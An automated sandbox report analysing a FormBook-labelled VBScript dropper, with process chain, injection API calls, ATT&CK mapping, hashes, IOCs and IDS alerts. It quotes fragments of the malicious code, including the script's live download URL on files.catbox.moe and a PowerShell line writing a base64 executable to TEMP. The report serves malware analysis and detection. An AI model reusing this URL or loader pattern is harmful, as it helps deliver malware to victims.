            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E94144 mov eax, dword ptr fs:[00000030h]7_2_02E94144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E94144 mov eax, dword ptr fs:[00000030h]7_2_02E94144
            Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\wscript.exe; Network Connect: 108.181.20.35 443
            Source: x.exe.4.dr, Program.cs; Reference to suspicious API methods: BaseApp.ReadProcessMemory(processHandle, address, ref baseAddress, 4, ref bytesRead)
            Source: x.exe.4.dr, Program.cs; Reference to suspicious API methods: BaseApp.VirtualAllocEx(processHandle, imageBase, size, 12288, 64)
            Source: x.exe.4.dr, Program.cs; Reference to suspicious API methods: BaseApp.WriteProcessMemory(Config.processInfo.ProcessHandle, newImageBase, executablePayload, size, ref bytesWritten)
            Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Users\user\AppData\Local\Temp\x.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A30008
            Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user~1\AppData\Local\Temp\x.exe"
            Source: C:\Users\user\AppData\Local\Temp\x.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\x.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation
            Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match; File source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.1720694148.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            Source: Yara match; File source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.1720694148.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
            Resource Development: 221 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
            Execution: 1 Native API; 1 Exploitation for Client Execution; 2 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
            Persistence: 221 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Privilege Escalation: 411 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 411 Process Injection; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
            Discovery: 21 Security Software Discovery; 1 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 12 System Information Discovery; Remote System Discovery; System Owner/User Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
            Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
            Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
            Behavior Graph ID: 1577448, Sample: z68scancopy.vbs, Startdate: 18/12/2024, Architecture: WINDOWS, Score: 100
            • Sample signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 7 other signatures
            • wscript.exe (started): DNS/IP files.catbox.moe, 108.181.20.35, 443, 49701, ASN852CA, Canada; dropped C:\Temp\dddddd.ps1, ASCII; signatures: System process connects to network (likely due to code injection or exploit); VBScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); 2 other signatures
            • powershell.exe (started by wscript.exe): dropped C:\Users\user\AppData\Local\Temp\x.exe, PE32; signatures: Suspicious execution chain found; Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
            • x.exe (started by powershell.exe): signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions; 2 other signatures
            • conhost.exe (started by powershell.exe)
            • RegAsm.exe (started by x.exe)

            Source | Detection | Scanner | Label
            z68scancopy.vbs | 21% | ReversingLabs | Script-WScript.Backdoor.FormBook
            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Temp\x.exe | 100% | Avira | TR/Dropper.Gen
            C:\Users\user\AppData\Local\Temp\x.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label
            https://files.catbox.moe; | 0% | Avira URL Cloud | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            files.catbox.moe | 108.181.20.35 | true | false | | high
            Name | Malicious | Antivirus Detection | Reputation
            https://files.catbox.moe/q8ynky.ps1 | false | | high
            Name | Source | Malicious | Antivirus Detection | Reputation
            https://files.catbox.moe; | wscript.exe, 00000000.00000003.1453026696.0000023359B15000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1396144396.000001D881BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000004.00000002.1396144396.000001D88183E000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.1396144396.000001D881BA0000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.1396144396.000001D881BA0000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://files.catbox.moe/~ | wscript.exe, 00000000.00000003.1452350762.0000023357BD6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453923296.0000023357BD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452049395.0000023357BD1000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://files.catbox.moe/q8ynky.ps1= | wscript.exe, 00000000.00000003.1452187676.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453799990.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452534194.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1453187394.0000023357B77000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://contoso.com/ | powershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1396144396.000001D881BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://contoso.com/License | powershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://contoso.com/Icon | powershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://oneget.orgX | powershell.exe, 00000004.00000002.1396144396.000001D88183E000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://files.catbox.moe/ | wscript.exe, 00000000.00000003.1452350762.0000023357BD6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453923296.0000023357BD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452049395.0000023357BD1000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.1396144396.000001D880001000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://files.catbox.moe | wscript.exe, 00000000.00000003.1453026696.0000023359B15000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://files.catbox.moe/q8ynky.ps13 | wscript.exe, 00000000.00000003.1452187676.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453799990.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452534194.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1453187394.0000023357B77000.00000004.00000020.00020000.00000000.sdmp | false | | high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.1396144396.000001D880001000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.1396144396.000001D881BA0000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://oneget.org | powershell.exe, 00000004.00000002.1396144396.000001D88183E000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://files.catbox.moe/q8ynky.ps1k | wscript.exe, 00000000.00000003.1452801377.0000023357B27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453767715.0000023357B28000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                      108.181.20.35 | files.catbox.moe | Canada | | 852 | ASN852CA | false
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1577448
                                                      Start date and time:2024-12-18 13:36:39 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 6m 29s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:z68scancopy.vbs
                                                      Detection:MAL
                                                      Classification:mal100.spre.troj.expl.evad.winVBS@8/7@1/1
                                                      EGA Information:
                                                      • Successful, ratio: 66.7%
                                                      HCA Information:
                                                      • Successful, ratio: 95%
                                                      • Number of executed functions: 24
                                                      • Number of non-executed functions: 316
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .vbs
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target powershell.exe, PID 7660 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: z68scancopy.vbs
                                                      Time | Type | Description
                                                      07:37:47 | API Interceptor | 5x Sleep call for process: powershell.exe modified
                                                      09:01:50 | API Interceptor | 3x Sleep call for process: RegAsm.exe modified
                                                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                      108.181.20.35 | Document.pdf.lnk | malicious | Unknown | files.catbox.moe/p1yr9i.pdf
                                                      108.181.20.35 | SecuriteInfo.com.HEUR.Trojan.OLE2.Agent.gen.26943.12401.msi | malicious | LummaC Stealer | files.catbox.moe/nzct1p
                                                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                      files.catbox.moe | 2zirzlMVqX.bat | malicious | Xmrig | 108.181.20.35
                                                      files.catbox.moe | QwLii5vouB.exe | malicious | Unknown | 108.181.20.35
                                                      files.catbox.moe | PO Huaruicarbon 98718.html | malicious | CorporateDataTheft, HTMLPhisher | 108.181.20.35
                                                      files.catbox.moe | 5QnwxSJVyX.doc | malicious | Unknown | 108.181.20.35
                                                      files.catbox.moe | file.exe | malicious | FormBook | 108.181.20.35
                                                      files.catbox.moe | file.exe | malicious | FormBook | 108.181.20.35
                                                      files.catbox.moe | https://drive.google.com/uc?export=download&id=11w_oRLtDWJl2z1SKN0zkobTHd_Ix44t9 | malicious | Unknown | 108.181.20.35
                                                      files.catbox.moe | LETA_pdf.vbs | malicious | AsyncRAT, PureLog Stealer | 108.181.20.35
                                                      files.catbox.moe | file.exe | malicious | FormBook | 108.181.20.35
                                                      files.catbox.moe | https://files.catbox.moe/iz3lne.zip | malicious | Unknown | 108.181.20.35
                                                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                      ASN852CA | loligang.mpsl.elf | malicious | Mirai | 207.34.214.194
                                                      ASN852CA | loligang.mips.elf | malicious | Mirai | 142.101.249.54
                                                      ASN852CA | sh4.nn.elf | malicious | Mirai, Okiru | 23.17.23.190
                                                      ASN852CA | 1.elf | malicious | Unknown | 142.169.19.83
                                                      ASN852CA | arm4.elf | malicious | Mirai | 199.175.20.28
                                                      ASN852CA | i686.elf | malicious | Mirai | 172.218.65.147
                                                      ASN852CA | spc.elf | malicious | Mirai, Moobot | 207.6.251.7
                                                      ASN852CA | arm5.elf | malicious | Mirai | 75.155.196.100
                                                      ASN852CA | x86.elf | malicious | Mirai | 207.81.69.113
                                                      ASN852CA | jignesh.exe | malicious | Quasar | 108.181.61.49
                                                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                      37f463bf4616ecd445d4a1937da06e19 | oiBxz37xUo.dll | malicious | Unknown | 108.181.20.35
                                                      37f463bf4616ecd445d4a1937da06e19 | T2dvU8f2xg.exe | malicious | Unknown | 108.181.20.35
                                                      37f463bf4616ecd445d4a1937da06e19 | oiBxz37xUo.dll | malicious | Unknown | 108.181.20.35
                                                      37f463bf4616ecd445d4a1937da06e19 | 7nJ9Jo78Vq.dll | malicious | Unknown | 108.181.20.35
                                                      37f463bf4616ecd445d4a1937da06e19 | 7nJ9Jo78Vq.dll | malicious | Unknown | 108.181.20.35
                                                      37f463bf4616ecd445d4a1937da06e19 | 3zhEXB7iUp.dll | malicious | Unknown | 108.181.20.35
                                                      37f463bf4616ecd445d4a1937da06e19 | i4VmSW2D4u.dll | malicious | Unknown | 108.181.20.35
                                                      37f463bf4616ecd445d4a1937da06e19 | 3zhEXB7iUp.dll | malicious | Unknown | 108.181.20.35
                                                      37f463bf4616ecd445d4a1937da06e19 | i4VmSW2D4u.dll | malicious | Unknown | 108.181.20.35
                                                      37f463bf4616ecd445d4a1937da06e19 | noll.exe | malicious | Stealc, Vidar | 108.181.20.35
                                                      No context
                                                      Process:C:\Windows\System32\wscript.exe
                                                      File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1035728
                                                      Entropy (8bit):4.368229562380478
                                                      Encrypted:false
                                                      SSDEEP:24576:7IMMjCG9gTl+disoG9j/aN16+O5HZ+NPOnJ680z4MDUBFMUbRK7yubjU:YgTl+3o6/aN1FO5HZ+Nm0800MDU8UbRb
                                                      MD5:BDA29E3B3586AD57E9889CEF65EC3F48
                                                      SHA1:FCF076AC8C3C7E61596E9A738E2732BB9505264D
                                                      SHA-256:9BD8112806E59DB39DE98D38F05F8466E625494AB9AA7E07AC7AC3014CB91B61
                                                      SHA-512:98DE720BFCDFFA461F2A7DCEFF6C73D93C9D739CCE4327318BDC971B91D16B4DA375EFC9B51BF10A75038CA6B0AD8B9167B895C82AC04875AC670C615C0EEF87
                                                      Malicious:true
                                                      Reputation:low
                                                      Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("
                                                      Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                      File Type:CSV text
                                                      Category:dropped
                                                      Size (bytes):226
                                                      Entropy (8bit):5.360398796477698
                                                      Encrypted:false
                                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                      MD5:3A8957C6382192B71471BD14359D0B12
                                                      SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                      SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                      SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                      Process:C:\Windows\System32\wscript.exe
                                                      File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1035728
                                                      Entropy (8bit):4.368229562380478
                                                      Encrypted:false
                                                      SSDEEP:24576:7IMMjCG9gTl+disoG9j/aN16+O5HZ+NPOnJ680z4MDUBFMUbRK7yubjU:YgTl+3o6/aN1FO5HZ+Nm0800MDU8UbRb
                                                      MD5:BDA29E3B3586AD57E9889CEF65EC3F48
                                                      SHA1:FCF076AC8C3C7E61596E9A738E2732BB9505264D
                                                      SHA-256:9BD8112806E59DB39DE98D38F05F8466E625494AB9AA7E07AC7AC3014CB91B61
                                                      SHA-512:98DE720BFCDFFA461F2A7DCEFF6C73D93C9D739CCE4327318BDC971B91D16B4DA375EFC9B51BF10A75038CA6B0AD8B9167B895C82AC04875AC670C615C0EEF87
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1628158735648508
                                                      Encrypted:false
                                                      SSDEEP:3:NlllulLhwlz:NllUO
                                                      MD5:F442CD24937ABD508058EA44FD91378E
                                                      SHA1:FDE63CECA441AA1C5C9C401498F9032A23B38085
                                                      SHA-256:E2960AF08E2EE7C9C72EEA31DBBFE1B55B9BF84DE2DD7BB7204487E6AF37B8F6
                                                      SHA-512:927E2EEA0BB3FC3D3A0DA7F45644F594CE29F11D90A84B005D723500258DE9E8B3780EB87242F4C62B64B9FEEA1869FC16076FA3AC89EC34E0546CDE1BEF7631
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:@...e................................................@..........
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):776704
                                                      Entropy (8bit):4.04135879191109
                                                      Encrypted:false
                                                      SSDEEP:12288:93GWShw4sBisE6wp1on88qnG0VZ2clLUJvIe3bdXbXokxJhOAPYkdTXC3Kx8fAqv:9pwMuV1A5TnEG
                                                      MD5:68FC317E2CC6A7B69F76B9D8DDEC0C79
                                                      SHA1:5D45C6401E970DED459D103737C8FD7D9EFE379C
                                                      SHA-256:A67C89C39A5F00AA0EB16D600080D78E995D0FECF2E8A12CF55EC4E978596853
                                                      SHA-512:8ABF7F25D28225D8C02E082862B4C090D225571C975DC5DDD8A3A577A5546D51AA65A6E3DCFC07DAD3EB53A18D1F6E8C86C4BF394169E626C1083AF3D2334661
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag................................. ........@.. .......................@............@.................................8...S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................p.......H.......,&................................................................(....*.0..2.......r...p(.....rC..p(.....r]..p....(....o.......(....*...0..a..........{.....{.....{....(......,.(....rz..p(.......(..........}.....|.....(.........}.....|....(....*...........66......6.|.....(....*...0..J..........}.......}.......}......(....}.......}......{.........(...+..|....(....*...0...........(........(....*.0............8....(.....(....-.r...ps....z..<(........4X(.....(............
                                                      File type:ASCII text, with CRLF line terminators
                                                      Entropy (8bit):4.931851297898062
                                                      TrID:
                                                      • Visual Basic Script (13500/0) 100.00%
                                                      File name:z68scancopy.vbs
                                                      File size:2'041 bytes
                                                      MD5:f8d8d9515f5dea0a837e4ada0559cce9
                                                      SHA1:f6b49863b6aa0a17cb0da253d72b3126ca825ffc
                                                      SHA256:6c342244e4efc5514dcbb7fce2bd00ad28531afe1f400257abd4acb8ecfac2d4
                                                      SHA512:747bb5c0e4f62da834949239013566b995280a87ed3d5338d0414f3e137c6af5455e4771b1638912021cdbbabc7e3b0e324820a8c355c97f1d0737ea008b0ee2
                                                      SSDEEP:48:ICNviLaRE/jyJ2yAwJGrn/kJBJk/mLJ5+/q:ICNGryJ3HJGr/kJfk/mLJ5+/q
                                                      TLSH:94415437ED0BD3615C378B0F856EE45DDE00419B75244550BEAC8847BF357E8EAA828D
                                                      File Content Preview:' Constants to avoid magic strings..Const URL = "https://files.catbox.moe/q8ynky.ps1"..Const DownloadPath = "C:\Temp\dddddd.ps1"..Const TEMP_DIR = "C:\Temp"..Const SUCCESS_STATUS = 200....' Secure PowerShell execution policy and command..Const POWERSHELL_
                                                      Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-18T13:37:42.820303+0100 | 2827578 | ETPRO MALWARE Likely Dropper Doc GET to .moe TLD | 1 | 192.168.2.7 | 49701 | 108.181.20.35 | 443 | TCP
2024-12-18T13:37:43.056873+0100 | 2018856 | ET MALWARE Windows executable base64 encoded | 1 | 108.181.20.35 | 443 | 192.168.2.7 | 49701 | TCP
